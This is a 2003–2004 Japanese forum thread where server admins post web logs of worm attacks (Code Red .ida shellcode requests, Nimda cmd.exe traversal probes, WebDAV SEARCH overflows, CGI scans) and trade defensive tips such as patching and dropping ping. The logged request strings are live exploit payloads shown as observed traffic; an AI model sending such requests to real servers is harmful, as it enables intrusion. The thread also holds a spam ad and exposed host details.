キタ━━━(゚∀゚)━━━!!!!
URLリンク(homepage3.nifty.com)

182:DNS未登録さん
03/06/14 10:32 O9Qyx1v0.net
これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。
212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya
URLリンク(212.165.132.144)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada
okadaって日本人か?

183:DNS未登録さん
03/06/14 12:11 .net
(´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・)

184:DNS未登録さん
03/06/14 12:25 .net
日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような

185:DNS未登録さん
03/06/14 12:29 .net
ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。

186:DNS未登録さん
03/06/14 22:35 .net
わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w

187:DNS未登録さん
03/06/16 06:20 .net
Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。

188:187
03/06/16 06:22 .net
あ、その下の物の方が重要っぽい。失礼

189:DNS未登録さん
03/06/17 18:35 .net
かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。
不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね


190:DNS未登録さん
03/06/25 00:41 .net
保守age

191:DNS未登録さん
03/06/25 18:58 wfI9oVW0.net
超過激ライブチャット登場!!!!!
あなたの命令で若い娘たちがヌレヌレモードへ
☆★アメリカ西海岸発☆★モザイクなし☆★
あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!
ただいま、10分間無料で体験できるほか7日間会費無料!!
URLリンク(www.gals-cafe.com)

192:DNS未登録さん
03/06/27 23:41 .net
>>190
喪前がageるから・・・

193:DNS未登録さん
03/07/03 03:00 .net
6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16

194:DNS未登録さん
03/07/05 03:27 .net
これワーム関係?初めて見たんだけど
それともアタック?
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行

195:DNS未登録さん
03/07/05 04:45 .net
アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい?
うちにはまだお見えになられてないです

196:DNS未登録さん
03/07/05 14:20 .net
>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
cgiwrapの設定不備狙ってる?
IIS狙いとは言い切れない予感。
例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル


197:DNS未登録さん
03/07/05 17:11 .net
>196
祭りドコー?


198:DNS未登録さん
03/07/06 03:35 .net
スレリンク(newsplus板)

199:山崎 渉
03/07/15 11:10 .net

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

200:DNS未登録さん
03/07/26 11:29 .net
孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・

201:DNS未登録さん
03/07/29 04:10 .net
そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。

202:DNS未登録さん
03/07/29 14:30 .net
最近、損さん家のf@t息子が猛烈アタックしてきます。
UDPの3010・3012・3013と投げてくるけど、これ何でしょ?

203:DNS未登録さん
03/07/29 17:23 .net
ロボットといえばnabotは迷惑だ

204:ぼるじょあ ◆ySd1dMH5Gk
03/08/02 05:04 .net
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎―――◎                      山崎渉&ぼるじょあ

205:DNS未登録さん
03/08/05 10:38 .net
これって何かのウイルス?
今朝会社にきたら、↓と同じぺージに書き換えられてた。
URLリンク(217.127.31.195)
やられて放置してる鯖もイパーイなんですが・・・。↓
URLリンク(www.google.co.jp)
なんやのこれ~~~!

206:DNS未登録さん
03/08/05 10:39 FAyYsQpc.net
あげ

207:DNS未登録さん
03/08/05 11:08 .net
>>205
なんで書き換えられちゃうわけ?あなたの会社のサイト
ろくにパッチも当ててないDQN鯖官なのけ

208:205
03/08/05 11:11 .net
>>207
ごめん、動揺して説明たらずだった。
会社きて、自宅のHP見てみようとしたら、書き換えられてた。
自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。
はぁ…

209:DNS未登録さん
03/08/05 11:16 .net
>>208
なんか穴があるんだろうね
いい機会だから徹底的にしらべましょう

210:DNS未登録さん
03/08/05 11:20 .net
この会社に恨みがある奴がやりまくったのかな

211:205
03/08/05 11:21 .net
SSLとBINDがあやしいっすね。
最近会社忙しく自宅鯖放置気味だったからバチが当たったなー…
なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい…

212:DNS未登録さん
03/08/05 12:56 .net
atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul
t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68
58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
この2ホスト、ここ1ヶ月ほど止まらない。
毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
そろそろISPのabuseにでも連絡すっかな。

213:DNS未登録さん
03/08/05 15:36 .net
>>212
> 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
・・・。

214:DNS未登録さん
03/08/05 20:59 qWW0gjj4.net
ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、
クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか?
もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。

215:DNS未登録さん
03/08/05 21:16 .net
>>214
根本的にだめ。
ウイルス、ワーム、セキュリティについてのポリシーを
自分で確立すべし

216:DNS未登録さん
03/08/06 19:31 .net
俺の自宅サーバーにおけるセキュリティについての考え方のひとつに
「稼動時間を減らす」てのあるけど誰も賛同してくれん。
「馬鹿じゃねぇ?」「使えねぇ!」の連呼




うるせー馬鹿!

217:DNS未登録さん
03/08/06 20:44 .net
>>216
いや、科学技術庁も導入したぐらいだし(藁

218:DNS未登録さん
03/08/06 21:29 .net
稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので
結局常時稼働とさほど変わらないんでないの?
セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。

219:DNS未登録さん
03/08/09 14:49 .net
うちは、CodeRedが30~40件/日、ほとんどが韓国と中国
それから、Nimdaも30~40連続アタック
[error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。

220:DNS未登録さん
03/08/09 15:00 .net
うちも先月までは>>219とほぼ同量のアタックがあったんだが、
1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら
解除した後もなぜかアタックが以前より減少してる


221:DNS未登録さん
03/08/09 20:59 .net
どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。
ヽ(`Д´)ノウワァァァン

222:DNS未登録さん
03/08/11 04:02 .net
Nimdaの時に比べたらかなり平和だよな。
あのときはピーク時で1分間に2~3回アクセスが続いたし。
帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。

223:山崎 渉
03/08/15 22:39 .net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

224:DNS未登録さん
03/08/16 09:01 .net
今度は135の悪夢

225:DNS未登録さん
03/09/04 02:11 LR09Pn2s.net
保守age

226:DNS未登録さん
03/09/05 21:06 .net
パケット通信危うし・・・
納入先監視装置、今月は1万円を越えました×n台
この先どうなることやら・・・

227:DNS未登録さん
03/09/10 01:25 .net
yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-"
デザインが変...

228:DNS未登録さん
03/09/21 00:51 WMVqyFB1.net
もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。
当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。
全部 bbtec.net 遮断に決定。俺は困らねぇし。

229:DNS未登録さん
03/09/21 01:06 yExHdUrY.net
UDP LOOPアタックくらいまくりなんですがどうしたらいいですか?
特定の相手難ですが。

230:DNS未登録さん
03/09/21 23:20 hhJEgwIw.net
2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
パッチ当ててない鯖って周りにも迷惑かけて最悪だな

231:DNS未登録さん
03/09/22 00:48 zRSNpj4D.net
ahooBBキター
2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"


232:困ってるよん
03/09/22 22:08 16HVoww6.net
IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか?
これずっとやられて、アクセス数がどんどん増えて行ってしまいます。
同時接続数が限られる環境でこの攻撃は痛いです。
だれか辞めさせる手段をご教授お願いします。
2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 -
2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 -
2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 -
2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 -
2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 -
2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 -
2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 -
2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 -
2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 -
2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 -
2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 -
2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 -
2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 -
2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 -
2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 -
2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 -
2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 -
2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 -


233:DNS未登録さん
03/09/22 22:16 9mxWCQXY.net
ホウムペイジ作り中だよっ
URLリンク(azarashi.ddo.jp)

234:sage
03/09/23 01:18 AzHK5NDc.net
うちのSnortSnarfの警告ページね。

2つの異なるイグネチャーが219.96.206.60として存在しています。発信源
・65個の事例はWEB-IIS ISAPI .ida attempt
・65個の事例はWEB-IIS cmd.exe access
ここ学校なんだよね~
あまりにウザイからwhoisでわざわざ調べて
メールで教えてあげようと思ったら。
failure noticeときたもんだ!
管理ちゃんとしようよー



235:DNS未登録さん
03/09/23 12:08 .net
>>234
219.96.206.60 = haruna.kibou.ed.jp
適当にpostmaster@とかwebmaster@に送ってみたらどうよ

236:DNS未登録さん
03/09/25 17:34 .net
いまだにcoderedとかに感染している奴氏んでしまえばいいのに

237:DNS未登録さん
03/09/25 17:59 .net
codegreenを(ry

238:DNS未登録さん
03/11/02 17:33 q0bLnL52.net
WINNTAutoAttackっていうんですかこれ?
221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%
u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
(以下略)
中国人かな?

239:DNS未登録さん
03/11/20 11:11 Ie2pkvRt.net
taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404

240:Hacktool.WKRShell
03/11/21 00:09 .net
URLリンク(www.symantec.com)
Hacktool.WKRShell
セキュリティホール memo
URLリンク(www.st.ryukoku.ac.jp)
Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
URLリンク(www.st.ryukoku.ac.jp)
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
URLリンク(www.st.ryukoku.ac.jp)
MS03-049が危険な理由 (ZDNet)
URLリンク(www.zdnet.co.jp)

241:DNS未登録さん
03/11/30 02:44 fHEXUDOq.net
445 のアタックすさまじすぎ

242:DNS未登録さん
03/11/30 13:08 Wqab79f6.net
最近こんなのばっか
213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
誰か対処法教えて…ログがわけわかんなくなる

243:DNS未登録さん
03/11/30 13:47 .net
ウチは、ルータで Directed Broadcast 破棄しといた

244:DNS未登録さん
03/12/01 00:13 .net
65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -%
アメリカより。


245:DNS未登録さん
03/12/02 14:27 .net
>>242
ping に反応しなきゃ送ってこない

246:DNS未登録さん
03/12/03 18:21 zykLI/Va.net
>>245
うちのルータもpingを排除したら迷惑な香具師も少なくなりますた

247:DNS未登録さん
03/12/03 23:16 .net
一日1500くらいアタックがくるよ。
一分に一回程度。
やんなっちゃう。
真っ当なアクセスなら1500って夢のような数字だけどさ
ルータ新しいのにかえようかなあ
pingを排除できるルータがあるんならかえたい。
けど、金ない。
よわったのお

248:DNS未登録さん
03/12/11 16:10 .net
>>247
iptables -A INPUT -p icmp -i ppp+ -j DROP
スレ違いレス

249:DNS未登録さん
04/01/21 04:09 .net
なんかこのスレ見て自分の鯖が心配になってきた。
確認する方法と防ぐ方法きぼんぬ。

250:DNS未登録さん
04/01/24 05:10 .net
OSがWindowsならWindowsUpだて汁!
他のOSはシラネ

251:DNS未登録さん
04/01/27 02:10 .net
>>249
linuxとかにしる

252:DNS未登録さん
04/01/27 19:07 .net
>>249
鯖の電源切れば心配しなくてもよくなるYO

253:DNS未登録さん
04/01/28 16:31 E31XDYJQ.net
良スレage

254:DNS未登録さん
04/02/05 00:53 .net
同じIPから毎日のように来るので
調べてみたらどうやらクライアント機らしい。
同じ時間帯に集中するのは、その時間帯に電源入れてるから。
updateやウイルスチェックぐらいしろと…

255:DNS未登録さん
04/02/05 01:15 .net
       巛彡彡ミミミミミ彡彡
       巛巛巛巛巛巛巛彡彡
   r、r.r 、|:::::           | 
  r |_,|_,|_,||::::::     ⌒   ⌒|
  |_,|_,|_,|/⌒     -="-  (-="    
  |_,|_,|_人そ(^i    '"" ) ・ ・)""ヽ  
  | )   ヽノ |.  ┃`ー-ニ-イ`┃    そうでっか、そうでっか、なるほどね
  |  `".`´  ノ   ┃  ⌒  ┃|  
  人  入_ノ´   ┃    ┃ノ\ 
/  \_/\\   ┗━┛/ \\
      /   \ ト ──イ/   ヽヽ
     /      ` ─┬─ イ     i i
    /          |      Y  | |
    /           |      ヽ__|_|
       巛彡彡ミミミミミ彡彡
       巛巛巛巛巛巛巛彡彡
   r、r.r 、|:::::           |
  r |_,|_,|_,||::::::     /'  '\ |
  |_,|_,|_,|/⌒      (・ )  (・ )|
  |_,|_,|_人そ(^i    ⌒ ) ・・)'⌒ヽ
  | )   ヽノ |.   ┏━━┓|
  |  `".`´  ノ   ┃ ノ ̄i ┃|
  人  入_ノ´   ┃ヽニニノ┃ノ\   ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの?
/  \_/\\   ┗━┛/|\\
      /   \ ト ──イ/   ヽヽ
     /      ` ─┬─ イ     i i
    /          |      Y  |

256:DNS未登録さん
04/02/10 05:16 .net
>>247
1500アタック/日?普通だよ、普通。
>>249
FW・フィルタ付きのルータを導入し、SYSLOGを見れ。

257:DNS未登録さん
04/02/11 11:45 .net
最近、時々来る "GET /sumthin"が不気味だな。
200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-"


258:DNS未登録さん
04/02/11 22:12 .net
>>257
それはサムスンの綴りを間違えたのです。

ってのは冗談で、
ググるとすこしはわかるかもしれませんよ。

259:DNS未登録さん
04/02/12 17:00 .net
ワームじゃないんだけど
韓国からのアクセスが多い、
ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね
鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、
一時間に3回ぐらいの割合で入ってる
毎回違う串さして同一人物がやってるんだろうか…
他にログが無くてこればっかり並んでるから激しく怖い

260:DNS未登録さん
04/02/14 20:26 .net
Windows98のIE5.5を詐称するならワーム
たしかWelchiaとかいう

261:DNS未登録さん
04/03/12 15:12 .net
218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
